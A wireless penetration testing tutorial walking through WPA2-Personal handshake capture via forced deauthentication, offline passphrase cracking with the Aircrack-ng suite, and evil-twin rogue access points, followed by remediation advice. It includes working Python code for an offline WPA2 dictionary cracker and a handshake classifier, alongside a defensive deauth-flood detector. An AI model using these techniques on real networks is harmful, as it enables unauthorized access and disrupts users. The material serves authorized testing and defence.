How To Perform A Wireless Penetration Test

Wireless penetration testing consists of six main steps:

  1. Reconnaissance
  2. Identifying wireless networks
  3. Vulnerability research
  4. Exploitation
  5. Reporting
  6. Remediation

These tests are performed primarily to find weaknesses in how a wireless network is deployed, configured and authenticated before an attacker within radio range does.

Misconfiguration, weak or widely shared credentials, and a lack of awareness of the attack techniques available to anyone who can hear the signal are the main reasons for performing this type of penetration test.


The term WiFi refers to the IEEE 802.11 family of wireless networking standards, which use radio waves instead of cables to connect devices to a network.

Due to the nature of WiFi and its methods for providing network access, malicious hackers often choose to penetrate a company by compromising its WiFi network and corresponding infrastructure devices.

Homes are also at risk, especially due to the rise of IoT connected devices and appliances.

In this article, we will focus our efforts on WiFi penetration testing steps, methods and most popular tools used in the WiFi penetration testing process.

What Is A Wireless Penetration Test?

Wireless penetration testing examines the company's WiFi access points, the devices that connect to them, and the authentication and encryption in between, looking for ways an outsider within radio range could join the network or eavesdrop on it.

These devices include laptops, tablets, smartphones, printers and any other internet of things (IoT) devices.

Wireless penetration tests are typically performed at the client's site, because the tester needs to be within range of the wireless signal to interact with it. A car park or a neighbouring building is often close enough, which is itself part of the point.

What Are The Goals Of A Wireless Pen Test?

Every penetration test should first go after the vulnerabilities that are easiest to exploit.

This is often called going for the “low-hanging fruit”: whatever is easy for the tester is just as easy for a real attacker, so these findings usually carry the highest practical risk.

In WiFi networks these weaknesses are most often found in the access points and how they are configured: a weak or widely shared pre-shared key, an outdated security mode such as WEP or WPA with TKIP, and access points that are not separated from the internal network by any Network Access Control. A lack of MAC filtering is often listed here as well, but MAC filtering is a weak control in its own right, because client addresses are transmitted in the clear and are trivially spoofed.

Where effective controls are missing, an attacker has a significant advantage and can use freely available WiFi hacking tools to gain unauthorized access to the network.

Steps To Performing A Wireless Penetration Test

As previously stated, we will focus on the methodology and steps for testing the WiFi network and give examples of certain attacks and tools that will accomplish our goal.

The steps below fall into the six areas listed at the start of the article.

Step 1: Wireless Reconnaissance

Before any attack, the first phase of every penetration test is information gathering.

Because WiFi is a radio medium, this gathering is done by war driving (or, for a single site, war walking): moving around the target premises with a wireless card in monitor mode and recording every network that can be heard, with its SSID, BSSID, channel, security mode and the clients talking to it. This also shows how far the signal leaks outside the building, which is a finding in itself.

To do this you will require the following equipment:

  • A car or any other transportation vehicle (or simply walking the perimeter of a small site).
  • A laptop and, optionally, an external directional antenna to extend range.
  • A wireless network adapter whose driver supports monitor mode and packet injection; many built-in cards do not, so verify this before the engagement.
  • Packet capture and analysis software, typically the Aircrack-ng suite and Wireshark.

Most of the traffic you capture here will be encrypted, since nearly every company network uses WPA2 (WPA3 is the newer standard, but it is not yet as widely deployed, and WPA2 remains the common case).

WPA2 protects the link by encrypting data frames with per-client keys that the access point and client derive during the EAPOL 4-way handshake; the authentication itself is either a pre-shared key (WPA2-Personal) or 802.1X/EAP against a RADIUS server (WPA2-Enterprise). Which of the two is in use decides the rest of the test: the handshake attack described below applies to the pre-shared-key mode.


Step 2: Identify Wireless Networks

The next step in WiFi penetration testing is scanning for, and identifying, wireless networks.

Before this phase you must put your wireless card into “monitor” mode so that it captures every frame on the air rather than only the frames addressed to it. With the Aircrack-ng suite this is done with airmon-ng against your wlan interface (for example wlan0), which creates a monitor interface such as wlan0mon; all remaining commands are run against that interface. airmon-ng warns about processes such as a network manager that interfere with monitor mode; stop them first, or the card will keep being reset underneath you.

Once the card is listening, start airodump-ng on the monitor interface. It hops across channels and lists every access point in range with its BSSID (the access point's MAC address), channel, encryption (open, WEP, WPA, WPA2 or WPA3), ESSID and signal strength, and below that the client stations associated with each one. Note the BSSID and channel of your target; you need both for every subsequent step.

To reduce the workload, and to make sure you do not miss the handshake while the card is off on another channel, lock airodump-ng to the target's channel and BSSID and write the capture to a file (its -c, --bssid and -w options). The file prefix chosen here is what you will later feed to the cracker; in this article it is dump, which produces dump-01.cap.

Step 3: Vulnerability Research

After finding access points through scanning, the next phase of the test focuses on identifying weaknesses in the target access point: the security mode it advertises (open, WEP, WPA/WPA2 with a pre-shared key, or 802.1X), the clients attached to it, and whether those clients reconnect automatically after being dropped.

The most commonly exploited weakness is in the WPA2-Personal 4-way handshake between the access point and an authenticating client. Contrary to what is often assumed, the pre-shared key is never transmitted. Both sides derive a 256-bit Pairwise Master Key from the passphrase and the SSID, exchange two random nonces in the clear, and derive from those a session key whose first 16 bytes (the KCK) are used to compute a Message Integrity Code over the handshake messages.

That MIC is what the attacker is after. Anyone who captures the two MAC addresses, both nonces and one MIC-protected handshake message can recompute the MIC for any candidate passphrase entirely offline, compare it with the captured value and know whether the guess was right, without ever sending a frame to the access point. The access point sees nothing, cannot rate-limit the attempts, and the only limit on guessing speed is the attacker's hardware.

To make this concrete, the next section walks through the handshake capture and the offline dictionary attack, and the tools used to carry them out.

Step 4: Exploitation

We will use the Aircrack-ng suite (aireplay-ng, airodump-ng and aircrack-ng) for the exploitation phase:

  • De-authenticating a legitimate client.
  • Capturing the 4-way handshake when that client reconnects.
  • Running an offline dictionary attack against the captured handshake.

Since airodump-ng is already capturing on the target's channel and writing to disk, we proceed directly to the next step.

De-authenticating A Legitimate Client

The 4-way handshake only occurs when a client (re)associates. Rather than wait for that to happen naturally, we force it: aireplay-ng sends spoofed deauthentication management frames to a connected client, given the access point's BSSID and the client's MAC address from the airodump-ng screen. Because management frames are not authenticated in classic WPA2, the client accepts them as if they came from the access point.

The client is disconnected, and the airodump-ng capture still running on that channel picks up the handshake as soon as the client's operating system reconnects automatically, which most do within seconds. Send a short burst of deauth frames rather than a continuous stream: one burst is enough, and a flood is both noisy and disruptive to the client's user.

Capturing The Initial Handshake

While the capture runs after the “de-auth” frames have been sent, the airodump-ng screen shows live information about the target: the channel number, time elapsed, BSSID (MAC address), number of beacons and data frames, the associated clients and more. When the handshake has been captured, airodump-ng reports it in its header line as “WPA handshake:” followed by the BSSID.

How long this takes depends on the distance between the tester, the access point and the client (the deauth frames have to reach the client), on whether the client reconnects automatically, and on whether the network uses 802.11w protected management frames, in which case unprotected deauth frames are ignored and this technique does not work.

Because airodump-ng was started with the -w option, the captured traffic is already being written to a “.cap” file. Open it in Wireshark, a popular network protocol analyzer, and filter on eapol to confirm which of the four handshake messages were captured. All four are not required: the cracking tools need message 2 plus either message 1 or message 3, because message 2 carries the client's nonce and the first MIC and the matching message supplies the access point's nonce. What does matter is that the messages belong to the same exchange, which you can verify from the Replay Counter field (messages 1 and 2 share a value, messages 3 and 4 the next one).

Once the handshake is confirmed, stop airodump-ng with Ctrl-C. The command “Airmon-ng stop wlan0mon” is not an airodump command and does not stop the capture; it removes the monitor interface and returns the card to normal managed mode, so run it when you are finished with the wireless card altogether.
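As an added example (not code from the original article), here is a small Python check that does what the Wireshark step above does by hand: it parses EAPOL-Key frames, identifies which of the four handshake messages each one is from its Key Information flags, and decides whether the capture holds a crackable pair with matching replay counters. The sample frames are constructed inline (nonces and MIC values are placeholders); with real data you would extract the EAPOL payloads from dump-01.cap with a pcap library, which this example does not do.

```python
"""Classify captured EAPOL-Key frames and check for a crackable WPA2 handshake.

Added example; not code from the original article. Frames are constructed inline.
"""
import struct
from collections import namedtuple

# Key Information bit flags (IEEE 802.11 EAPOL-Key descriptor).
KI_INSTALL, KI_ACK, KI_MIC, KI_SECURE = 1 << 6, 1 << 7, 1 << 8, 1 << 9

EapolKey = namedtuple("EapolKey", "message replay_counter nonce mic")


def eapol_key_frame(key_info, replay_counter, nonce, mic=bytes(16)):
    """Build a minimal EAPOL-Key frame (empty Key Data) for the constructed sample."""
    body = (struct.pack(">BHHQ", 2, key_info, 16, replay_counter)  # RSN descriptor, key info, key length, replay ctr
            + nonce + bytes(16 + 8 + 8)                              # nonce, key IV, RSC, key ID
            + mic + b"\x00\x00")                                     # MIC, key data length 0
    return struct.pack(">BBH", 2, 3, len(body)) + body               # 802.1X: version 2, type 3 = EAPOL-Key


def parse_eapol_key(frame):
    """Return an EapolKey with the handshake message number (1-4), or None if not EAPOL-Key."""
    if len(frame) < 99:
        return None
    _version, ptype, length = struct.unpack(">BBH", frame[:4])
    if ptype != 3:
        return None
    body = frame[4:4 + length]
    key_info = struct.unpack(">H", body[1:3])[0]
    replay_counter = struct.unpack(">Q", body[5:13])[0]
    nonce, mic = body[13:45], body[77:93]
    ack, has_mic, secure = bool(key_info & KI_ACK), bool(key_info & KI_MIC), bool(key_info & KI_SECURE)
    # Only the AP sets Key ACK (messages 1 and 3); only message 1 lacks a MIC;
    # message 4 is the client's only message with the Secure bit set.
    if ack:
        message = 3 if has_mic else 1
    else:
        message = 4 if secure else 2
    return EapolKey(message, replay_counter, nonce, mic)


def messages_seen(frames):
    """Set of handshake message numbers present in the capture."""
    return {k.message for k in map(parse_eapol_key, frames) if k}


def is_crackable(frames):
    """True if the capture holds M1+M2 or M2+M3 from the same exchange.

    Messages 1 and 2 share a replay counter; message 3 uses that value plus one.
    A stale M1 from an earlier session paired with a fresh M2 yields a handshake
    that will never crack, which is why the counter check matters.
    """
    keys = [k for k in map(parse_eapol_key, frames) if k]
    for m2 in (k for k in keys if k.message == 2):
        for other in keys:
            if other.message == 1 and other.replay_counter == m2.replay_counter:
                return True
            if other.message == 3 and other.replay_counter == m2.replay_counter + 1:
                return True
    return False


def constructed_handshake():
    """One complete, consistent 4-way handshake (constructed; nonces and MICs are placeholders)."""
    anonce, snonce = bytes([0xA1]) * 32, bytes([0x5E]) * 32
    mic = bytes([0x11]) * 16
    return [
        eapol_key_frame(0x008A, 1, anonce),         # M1: AP -> STA, ACK, no MIC
        eapol_key_frame(0x010A, 1, snonce, mic),    # M2: STA -> AP, MIC
        eapol_key_frame(0x13CA, 2, anonce, mic),    # M3: AP -> STA, Install+ACK+MIC+Secure
        eapol_key_frame(0x030A, 2, bytes(32), mic), # M4: STA -> AP, MIC+Secure
    ]


if __name__ == "__main__":
    frames = constructed_handshake()
    print("messages:", sorted(messages_seen(frames)), "crackable:", is_crackable(frames))
    stale_m1 = eapol_key_frame(0x008A, 9, bytes(32))
    print("stale M1 + fresh M2 crackable:", is_crackable([stale_m1, frames[1]]))
```

The Key Information values 0x008A, 0x010A, 0x13CA and 0x030A are the ones a WPA2-CCMP handshake normally shows in Wireshark for messages 1 to 4; if your capture classifies as {2, 4} only, the access point's messages were missed and you need to capture again.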

Dictionary Attack On The Captured Handshake

The final step of the exploitation phase is to recover the passphrase from the captured 4-way handshake.

This does not require a separate password cracker such as John the Ripper (Hydra, which is sometimes mentioned here, is an online login brute-forcer and has no role in an offline attack). For large wordlists or rule-based attacks, hashcat is the usual choice because it runs on GPUs, but for a simple dictionary run aircrack-ng, which belongs to the same Aircrack-ng suite as aireplay-ng and airodump-ng, is enough.

aircrack-ng is pointed at the capture file (dump-01.cap), the target access point's BSSID (its -b option, so that handshakes from other networks in the same capture are ignored) and a dictionary file (-w). It then performs the key derivation described in Step 3 for every line of the dictionary and stops when a candidate reproduces the captured MIC.

In our test the passphrase “community” was recovered within seconds. That is the whole lesson of this attack: a WPA2-Personal network is exactly as strong as its passphrase, and a dictionary word offers no protection no matter how well the traffic is encrypted.
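To show what aircrack-ng is actually doing in the step above, and to make the Step 3 explanation concrete, here is an added Python example (not code from the original article or from the Aircrack-ng project) that performs the WPA2-Personal derivation and the offline dictionary attack itself: PBKDF2 from passphrase and SSID to the PMK, the 802.11 PRF to the PTK, and HMAC-SHA1 over EAPOL message 2 to the MIC that is compared against the captured one. Since no real capture is available offline, the block constructs its own “capture” (MAC addresses, SSID, nonces and message 2) from the passphrase “community”, standing in for what airodump-ng would have written to dump-01.cap; the SSID CorpGuest and the MAC addresses are made up.

```python
"""Offline WPA2-PSK recovery from a captured 4-way handshake.

Added example, not the article's or Aircrack-ng's code. The capture is constructed.
"""
import hashlib
import hmac
import os
import struct


def derive_pmk(passphrase, ssid):
    """WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).

    This is the expensive step and the only place the passphrase enters; it is why
    cracking speed is measured in thousands (CPU) to millions (GPU) of guesses per second.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk, ap_mac, client_mac, anonce, snonce):
    """IEEE 802.11 PRF: PTK from the PMK, both MACs and both nonces (all public except the PMK)."""
    data = min(ap_mac, client_mac) + max(ap_mac, client_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]  # KCK = first 16 bytes, KEK = next 16, TK = next 16 for CCMP


def eapol_key_frame(key_info, replay_counter, nonce, mic=bytes(16)):
    """Minimal EAPOL-Key frame (empty Key Data); the MIC sits at bytes 81..96."""
    body = struct.pack(">BHHQ", 2, key_info, 16, replay_counter) + nonce + bytes(32) + mic + b"\x00\x00"
    return struct.pack(">BBH", 2, 3, len(body)) + body


def compute_mic(kck, eapol_frame):
    """WPA2 (key descriptor version 2): HMAC-SHA1 over the frame with its MIC field zeroed, truncated to 16."""
    zeroed = eapol_frame[:81] + bytes(16) + eapol_frame[97:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack_psk(capture, wordlist):
    """Return the passphrase that reproduces the captured MIC, or None. Never touches the network."""
    target_mic = capture["eapol_msg2"][81:97]
    for candidate in wordlist:
        pmk = derive_pmk(candidate, capture["ssid"])
        kck = derive_ptk(pmk, capture["ap_mac"], capture["client_mac"],
                         capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(compute_mic(kck, capture["eapol_msg2"]), target_mic):
            return candidate
    return None


def constructed_capture(passphrase="community", ssid="CorpGuest"):
    """Stand-in for the fields aircrack-ng would pull out of dump-01.cap (all values constructed)."""
    ap_mac, client_mac = bytes.fromhex("001122aabbcc"), bytes.fromhex("66554433bbaa")
    anonce, snonce = os.urandom(32), os.urandom(32)
    kck = derive_ptk(derive_pmk(passphrase, ssid), ap_mac, client_mac, anonce, snonce)[:16]
    unsigned_msg2 = eapol_key_frame(0x010A, 1, snonce)          # client's message 2, MIC still zero
    msg2 = eapol_key_frame(0x010A, 1, snonce, compute_mic(kck, unsigned_msg2))
    return {"ssid": ssid, "ap_mac": ap_mac, "client_mac": client_mac,
            "anonce": anonce, "snonce": snonce, "eapol_msg2": msg2}


if __name__ == "__main__":
    cap = constructed_capture()
    # A tiny constructed wordlist; real runs use rockyou-sized lists or hashcat rules.
    print("recovered:", crack_psk(cap, ["password", "12345678", "community", "letmein"]))
```

Note that nothing in crack_psk needs the access point: everything it uses was sent in the clear during the handshake, which is why a weak passphrase cannot be protected by lockouts, rate limits or MAC filtering.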

Other Wireless Attacks

Capturing the 4-way handshake and attacking it offline is one of the most effective ways to gain unauthorized access, which is why we walked through that one attack in detail.

Another practical attack is the rogue access point: an unauthorized access point that the attacker places inside or next to the company's buildings.

In its “evil twin” form the rogue advertises the same SSID as a legitimate network and overpowers its signal, so that employees' devices, which prefer the strongest signal for a network they already know, connect to the attacker instead. (Using a signal jammer to knock the legitimate access point off the air is sometimes suggested for this purpose; jamming is illegal in most jurisdictions and has no place in an authorized test.)

If this succeeds, the attacker controls all traffic passing through the rogue access point and can inspect it, tamper with it, or present fake captive portals and login pages to harvest credentials.

Step 5: Reporting

Structuring all of your steps, methods and findings into a comprehensive document is the most important part of a penetration tester's work: the report is the only deliverable the client keeps.

Document every step as you go, including the commands run, the capture files and screenshots of the tool output, so that each finding can be reproduced by the client's own staff.

Make sure to include an executive summary, the technical risks in detail, the vulnerabilities you found along with the complete process of how you found them, the exploits that succeeded (for example the recovered passphrase and how long it took), and prioritized recommendations for mitigation.


Step 6: Remediation And Security Controls

We demonstrated one practical wireless exploit: capturing the WPA2 4-way handshake and recovering the pre-shared key offline.

The attack succeeded for one fundamental reason: the network relied on a short, dictionary-word pre-shared key. MAC filtering would not have prevented any of it. The handshake capture and the offline crack do not require associating to the network at all, and once the attacker does want to connect, client MAC addresses travel unencrypted in every frame, so cloning an address from the approved list takes a single command. Treat MAC filtering as a minor inconvenience to the attacker, not as a security control.

Controls that actually address this attack are:

  • A long, randomly generated passphrase (a dictionary attack is hopeless against 20 or more random characters), changed whenever staff who know it leave.
  • Better, WPA2-Enterprise or WPA3-Enterprise with 802.1X, so each user authenticates with individual credentials or a certificate and there is no shared secret to crack.
  • WPA3-Personal (SAE) where client support allows, which replaces the pre-shared-key handshake with one that cannot be attacked offline.
  • 802.11w protected management frames, which authenticate deauthentication frames and so defeat the forced-reconnect step.

Network Access Control (NAC) on the wired side, such as 802.1X on switch ports, prevents a rogue access point plugged into a spare port from reaching the internal network. On the wireless side, a wireless intrusion detection system that alerts on unknown BSSIDs broadcasting the company's SSID and on deauthentication floods catches both the rogue access point and the attack above while they are in progress.

Additionally, the company may consider deploying wireless honeypots: decoy networks with no legitimate users, so that any association attempt or handshake capture against them is by definition malicious and worth investigating.
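As an added example of the detection side (not part of the original article or of any product), here is a Python detector for the deauthentication flood used in Step 4, run over a constructed list of captured management frames. A monitor-mode sensor would normally feed it frames parsed from a pcap; here the frame records are built inline. It counts deauthentication and disassociation frames per BSSID in a sliding time window and raises an alert when the rate is far beyond what a legitimate access point produces, noting whether the frames went to the broadcast address (a strong tell for tools, since an access point has little reason to deauthenticate everyone at once). The window and threshold are assumptions to tune for your environment.

```python
"""Detect 802.11 deauthentication floods in captured management frames.

Added example; the frames below are constructed, not captured from a real network.
"""
from collections import defaultdict, deque, namedtuple

# One captured management frame as a sensor would hand it over after parsing.
Frame = namedtuple("Frame", "ts subtype src dst bssid reason")

BROADCAST = "ff:ff:ff:ff:ff:ff"
DISCONNECT_SUBTYPES = ("deauth", "disassoc")


def detect_deauth_flood(frames, window_s=2.0, threshold=5):
    """Sliding-window rate check per BSSID.

    Returns one alert per BSSID that sends `threshold` or more deauth/disassoc
    frames within any `window_s`-second window. A healthy AP sends these rarely
    (idle timeouts, roaming), so a burst is almost always an injection tool.
    """
    alerts = []
    recent = defaultdict(deque)   # bssid -> frames still inside the window
    alerted = set()
    for f in sorted(frames, key=lambda fr: fr.ts):
        if f.subtype not in DISCONNECT_SUBTYPES:
            continue
        window = recent[f.bssid]
        window.append(f)
        while window and f.ts - window[0].ts > window_s:
            window.popleft()
        if len(window) >= threshold and f.bssid not in alerted:
            alerted.add(f.bssid)
            alerts.append({
                "bssid": f.bssid,
                "first_ts": window[0].ts,
                "last_ts": f.ts,
                "count": len(window),
                "broadcast": any(fr.dst == BROADCAST for fr in window),
                "reasons": sorted({fr.reason for fr in window}),
                # Source equal to the BSSID means the sender claims to be the AP itself.
                "spoofed_ap_src": all(fr.src == f.bssid for fr in window),
            })
    return alerts


def constructed_frames():
    """Constructed sample: one benign deauth, then a burst like aireplay-ng's against one AP."""
    ap, client, other_ap = "00:11:22:aa:bb:cc", "66:55:44:33:bb:aa", "00:11:22:dd:ee:ff"
    frames = [
        Frame(0.0, "beacon", ap, BROADCAST, ap, None),
        Frame(3.5, "deauth", other_ap, client, other_ap, 4),   # idle timeout: legitimate, isolated
        Frame(4.0, "data", client, ap, ap, None),
    ]
    # Ten deauth frames in under a second, AP address as source, broadcast destination,
    # reason code 7 (the value aireplay-ng sends): the signature of a forced-reconnect burst.
    frames += [Frame(10.0 + i * 0.1, "deauth", ap, BROADCAST, ap, 7) for i in range(10)]
    return frames


if __name__ == "__main__":
    for alert in detect_deauth_flood(constructed_frames()):
        print(alert)
```

On a network that enforces 802.11w, any unprotected deauth frame for a protected BSSID is itself an alert, regardless of rate; that check is a one-line addition once the sensor reports whether the frame was protected.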

Conclusion

Wireless networks need just as much security consideration during deployment and configuration as the wired network they connect to.

Wireless penetration testing is therefore a popular way to determine the realistic security posture of your wireless networks.

Even though it requires a little more hardware than the usual penetration test (chiefly an adapter that supports monitor mode and injection), wireless penetration testing is performed with software tools shipped in Kali Linux, the best known of which is the Aircrack-ng suite.

We demonstrated a practical use of the Aircrack-ng suite (airmon-ng, airodump-ng, aireplay-ng and aircrack-ng) and the results its tools can give.

All that is left for you to do now is try it out on your own (make sure you have written authorization for whatever test you plan to do, however small) and fix the weaknesses you find.

Article by

Strahinja Stankovic, ECSA
Strahinja is a Senior Information Security Analyst with 7 years of professional experience in cyber security. His primary focus is on security event monitoring, analysis and incident response.
